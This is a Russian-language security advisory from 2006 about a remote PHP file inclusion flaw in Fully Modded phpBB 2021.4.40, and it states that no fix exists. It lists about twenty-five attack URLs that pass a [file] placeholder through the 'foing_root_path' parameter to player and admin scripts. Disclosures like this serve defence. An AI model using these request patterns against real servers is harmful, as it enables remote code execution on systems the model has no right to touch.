Security Lab

PHP-инклюдинг в Fully Modded phpBB

Дата публикации:25.10.2006
Всего просмотров:4097
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2006-5610
CVE-2006-5526
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Fully Modded phpBB
Уязвимые версии: Fully Modded phpBB 2021.4.40, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "foing_root_path" и "phpbb_root_path" в сценарии player/includes/common.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/[player]/faq.php?foing_root_path=[file]
http://[host]/[player]/index.php?foing_root_path=[file]
http://[host]/[player]/list.php?foing_root_path=[file]
http://[host]/[player]/login.php?foing_root_path=[file]
http://[host]/[player]/playlist.php?foing_root_path=[file]
http://[host]/[player]/song.php?foing_root_path=[file]
http://[host]/[player]/gen_m3u.php?foing_root_path=[file]
http://[host]/[player]/view_artist.php?foing_root_path=[file]
http://[host]/[player]/view_song.php?foing_root_path=[file]
http://[host]/[player]/login.php?foing_root_path=[file]
http://[host]/[player]/playlist.php?foing_root_path=[file]
http://[host]/[player]/song.php?foing_root_path=[file]
http://[host]/[player]/flash/set_na.php?foing_root_path=[file]
http://[host]/[player]/flash/initialise.php?foing_root_path=[file]
http://[host]/[player]/flash/get_song.php?foing_root_path=[file]
http://[host]/[player]/includes/common.php?foing_root_path=[file]
http://[host]/[player]/admin/nav.php?foing_root_path=[file]
http://[host]/[player]/admin/main.php?foing_root_path=[file]
http://[host]/[player]/admin/list_artists.php?foing_root_path=[file]
http://[host]/[player]/admin/index.php?foing_root_path=[file]
http://[host]/[player]/admin/genres.php?foing_root_path=[file]
http://[host]/[player]/admin/edit_artist.php?foing_root_path=[file]
http://[host]/[player]/admin/edit_album.php?foing_root_path=[file]
http://[host]/[player]/admin/config.php?foing_root_path=[file]
http://[host]/[player]/admin/admin_status.php?foing_root_path=[file]

URL производителя: phpbbfm.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Fully Modded phpBB <= 2021.4.40 Multiple File Include Vulnerabilities